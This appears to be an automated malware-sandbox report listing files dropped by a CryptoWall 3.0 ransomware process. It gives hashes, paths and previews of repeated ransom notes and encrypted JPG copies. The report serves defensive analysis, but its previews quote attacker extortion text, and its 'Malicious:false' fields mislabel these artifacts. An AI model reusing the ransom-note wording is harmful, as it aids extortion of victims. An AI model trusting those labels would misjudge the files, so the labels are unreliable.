                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\STARTUP\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\XLSTART\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\XLSTART\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Office14\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Office14\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Stationery\1033\NOTEBOOK.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3374
                                                                                                                          Entropy (8bit):7.886517893917096
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDv6Q7RrXD9141h+fl0uT3j9xTm5WBBfkDwYu:GoTjp14H+t0M3jiaecYu
                                                                                                                          MD5:07C69015B818C67D9A91E78916E8DBD0
                                                                                                                          SHA1:935E0AE1F19BC92BAD0440A7761B59391A0DAE69
                                                                                                                          SHA-256:27F4759F071D2A48F8177A10FA55C67F62518C44618F5297CB0E04A025F37BB7
                                                                                                                          SHA-512:FF4C75D4EFADBF9298DE05D79CDA57B46C0A216938CAB76B9CD25AF893B64DFDEF015CFC0F761413C5E46BB81F294DB35A7E77CC7DD5D85C16160F2A9FCEE561
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.........8R...O$.....;C..2=a.n...HT......9E?..]..^.-.3....bT.(.E....ma.[.....+..)[8.K.Ej8.3..Dm.~u.B.2....._K....v.g8Jc,...03..M.<..9...}.U..P.L-....s.m...X.J..iB..N..1.p.j?j..J&R....sdx..c7.Buyz74...h...m......P..X.!.7......q...0.!.D..i..=d.#..U.P&...w.8q.i.kn..$FjU...H%...X..'..,w..=..*=..I.H.K:.\.1.8..v....,.....9.9.|BV{..%c<OM......o..r.6...~..))<x!....*(,vp.Oy..J.(...)~..%.........Gq..p..l_*......&^G".....M0.../O...o... ta.O6..p...... .......+.1..D...V....).p..q..".e&.....n{.b.o..GQ.0s..T..Xxp.f...L.f."[w....... g...Z..W..[.z.:=,....g..o..~w...}.3..f.h..]t@..w3t..2.y.

                                                                                                                          C:\Program Files\Microsoft Office\Stationery\1033\NOTEBOOK.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3374
                                                                                                                          Entropy (8bit):7.886517893917096
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDv6Q7RrXD9141h+fl0uT3j9xTm5WBBfkDwYu:GoTjp14H+t0M3jiaecYu
                                                                                                                          MD5:07C69015B818C67D9A91E78916E8DBD0
                                                                                                                          SHA1:935E0AE1F19BC92BAD0440A7761B59391A0DAE69
                                                                                                                          SHA-256:27F4759F071D2A48F8177A10FA55C67F62518C44618F5297CB0E04A025F37BB7
                                                                                                                          SHA-512:FF4C75D4EFADBF9298DE05D79CDA57B46C0A216938CAB76B9CD25AF893B64DFDEF015CFC0F761413C5E46BB81F294DB35A7E77CC7DD5D85C16160F2A9FCEE561
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264.........8R...O$.....;C..2=a.n...HT......9E?..]..^.-.3....bT.(.E....ma.[.....+..)[8.K.Ej8.3..Dm.~u.B.2....._K....v.g8Jc,...03..M.<..9...}.U..P.L-....s.m...X.J..iB..N..1.p.j?j..J&R....sdx..c7.Buyz74...h...m......P..X.!.7......q...0.!.D..i..=d.#..U.P&...w.8q.i.kn..$FjU...H%...X..'..,w..=..*=..I.H.K:.\.1.8..v....,.....9.9.|BV{..%c<OM......o..r.6...~..))<x!....*(,vp.Oy..J.(...)~..%.........Gq..p..l_*......&^G".....M0.../O...o... ta.O6..p...... .......+.1..D...V....).p..q..".e&.....n{.b.o..GQ.0s..T..Xxp.f...L.f."[w....... g...Z..W..[.z.:=,....g..o..~w...}.3..f.h..]t@..w3t..2.y.

                                                                                                                          C:\Program Files\Microsoft Office\Stationery\1033\PINELUMB.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4398
                                                                                                                          Entropy (8bit):7.926260837758786
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDg9157kH+pA99/nJM2Ti5nBXXkCABtgT:GokC+p4/JkXnkCrT
                                                                                                                          MD5:12A5C7F9C2A4F24C1203411ACE7E495F
                                                                                                                          SHA1:E3E0C7E4441BF4B7978063B2ABFD183D8A8F712D
                                                                                                                          SHA-256:06D7AA81C086C43DC11B8F84E3217A874250CC61851E2897D81C02C7723B2384
                                                                                                                          SHA-512:D8EF697DD2BA2E460F08241EC24B59CA05E5472D21628C7C6EC8085C39162EF72B3987B59E644AB64C1A994F163C83BA0D8F936A3F14BB6C40FF20B7F65076E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..,`.'x.G.....N.......R^.?-#z.1p.....i/....0H.+..a.....~>d.g.Rlx.J3....ne.AD.O..Q..L.!....B...b...k."p....O.l*.....:2.8...O../.``.y.....P9.........CU.....4...Z.Swm.o . ......c.w..>..h.........o..[.1......fh.J|c....R...^.:......'z...$....H....P...{....KG.....B.t..QS...N,Z....._....E.<Q>3.Z.+.e..]%e!O.$....d2.....!...&..dv.G06.Da"2.(.....p...Dd..4..7l..rf.N.N.......U... .Rw..aYR\.>N.I.V...8]...,w.........+>*kbZb.%.<1=.bz..H.vn.<.P.M.....a..c..._....:jg.j....O.IM'x2...?.~.e..Z.[...$.*aZ...3.....l_...k....Y...o^..y.1..z.s...w..s.....k.Ld....%N..?.VM.9.{O.F.Rb...&W.m'

                                                                                                                          C:\Program Files\Microsoft Office\Stationery\1033\PINELUMB.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4398
                                                                                                                          Entropy (8bit):7.926260837758786
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:cztoDg9157kH+pA99/nJM2Ti5nBXXkCABtgT:GokC+p4/JkXnkCrT
                                                                                                                          MD5:12A5C7F9C2A4F24C1203411ACE7E495F
                                                                                                                          SHA1:E3E0C7E4441BF4B7978063B2ABFD183D8A8F712D
                                                                                                                          SHA-256:06D7AA81C086C43DC11B8F84E3217A874250CC61851E2897D81C02C7723B2384
                                                                                                                          SHA-512:D8EF697DD2BA2E460F08241EC24B59CA05E5472D21628C7C6EC8085C39162EF72B3987B59E644AB64C1A994F163C83BA0D8F936A3F14BB6C40FF20B7F65076E5
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264..,`.'x.G.....N.......R^.?-#z.1p.....i/....0H.+..a.....~>d.g.Rlx.J3....ne.AD.O..Q..L.!....B...b...k."p....O.l*.....:2.8...O../.``.y.....P9.........CU.....4...Z.Swm.o . ......c.w..>..h.........o..[.1......fh.J|c....R...^.:......'z...$....H....P...{....KG.....B.t..QS...N,Z....._....E.<Q>3.Z.+.e..]%e!O.$....d2.....!...&..dv.G06.Da"2.(.....p...Dd..4..7l..rf.N.N.......U... .Rw..aYR\.>N.I.V...8]...,w.........+>*kbZb.%.<1=.bz..H.vn.<.P.M.....a..c..._....:jg.j....O.IM'x2...?.~.e..Z.[...$.*aZ...3.....l_...k....Y...o^..y.1..z.s...w..s.....k.Ld....%N..?.VM.9.{O.F.Rb...&W.m'

                                                                                                                          C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.JPG

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6702
                                                                                                                          Entropy (8bit):7.96132324157974
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GonF5Ii3+fSWybKNzVOSRG3iVukay2HLJ:GK5IIm1VO4oTkdUN
                                                                                                                          MD5:B6E4228E833128A10ADDEE0B2B96402C
                                                                                                                          SHA1:BA7635203D0FBCACF76E44C6C03B59279F24820D
                                                                                                                          SHA-256:9109DA08798C6704BB63FCF3C5EF380FA496D147FE6315B4E6AC277AA557AF71
                                                                                                                          SHA-512:0B2FF4EF53079DD0CAA6D109A38A793CCA2F5AF326F0F558A665219A4CF1D17AD161FEA361DDBE4BF23B942FD718F2F2B0B6D35DA78D2B3E609E5F1269808F66
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....Ao.)y....O.........)'..Y....b._qQ@.........!G.M. h.b.'v..W.F..$.7........hi|.F..'...@>h)..G..u..P?.vX.".....{.....`.......q.Z5.3.g.....A..%..N..).........I..o^..e.J|5..S....o(......z.9..0..(0.&AF...=h.tKV.j....Z......k.m..f......L.e0.0..#`k..../.......S.....6.dR.r....'B.P.3....-..fD.#<..M9.)...Y.....$.xg...f.........F33.x...Z....g..a..;...O..........^I......1..cd..V...3....DMW.+.r...g.".yv..f......PCk...>..[....f....-6$.QT..2)....6.=..f(M.L..m.^.J.k.\C..?..<...UL.xI..<..gb..W'gZ.W..2..J....3......$N]<....?~..9f.]..$.......w.ja-..hf.h......Y.p...._:".1.`WQ7.

                                                                                                                          C:\Program Files\Microsoft Office\Stationery\1033\SEAMARBL.JPG.aaa (copy)

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):6702
                                                                                                                          Entropy (8bit):7.96132324157974
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:192:GonF5Ii3+fSWybKNzVOSRG3iVukay2HLJ:GK5IIm1VO4oTkdUN
                                                                                                                          MD5:B6E4228E833128A10ADDEE0B2B96402C
                                                                                                                          SHA1:BA7635203D0FBCACF76E44C6C03B59279F24820D
                                                                                                                          SHA-256:9109DA08798C6704BB63FCF3C5EF380FA496D147FE6315B4E6AC277AA557AF71
                                                                                                                          SHA-512:0B2FF4EF53079DD0CAA6D109A38A793CCA2F5AF326F0F558A665219A4CF1D17AD161FEA361DDBE4BF23B942FD718F2F2B0B6D35DA78D2B3E609E5F1269808F66
                                                                                                                          Malicious:false
                                                                                                                          Preview:.......Jo^:...Z>o.V...T......97...*B;s.e...u.G.D...|.h....}.....L...30D1996F1A492AA30FCF9497206A54F0C8D74560AAC62339F0BC0BAAA6DAB976DE365DD572ABC254A50A3ACDB7CB0C60887A60E715739AB439E8F62BF941EBFC...a.....c1.u.+J.?.TnEi......Dwu.Fw.N....i......L.Y5....xW.8..172304DDC290DE25921A350AF1824FDB0668739C2EB2D3563A300566BD56B5EE8E1FBAB113ED2672569F8857F651D789B9F5DB9EF22F8E1D91EBE55D8333A264....Ao.)y....O.........)'..Y....b._qQ@.........!G.M. h.b.'v..W.F..$.7........hi|.F..'...@>h)..G..u..P?.vX.".....{.....`.......q.Z5.3.g.....A..%..N..).........I..o^..e.J|5..S....o(......z.9..0..(0.&AF...=h.tKV.j....Z......k.m..f......L.e0.0..#`k..../.......S.....6.dR.r....'B.P.3....-..fD.#<..M9.)...Y.....$.xg...f.........F33.x...Z....g..a..;...O..........^I......1..cd..V...3....DMW.+.r...g.".yv..f......PCk...>..[....f....-6$.QT..2)....6.=..f(M.L..m.^.J.k.\C..?..<...UL.xI..<..gb..W'gZ.W..2..J....3......$N]<....?~..9f.]..$.......w.ja-..hf.h......Y.p...._:".1.`WQ7.

                                                                                                                          C:\Program Files\Microsoft Office\Stationery\1033\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Program Files\Microsoft Office\Stationery\1033\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Program Files\Microsoft Office\Stationery\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
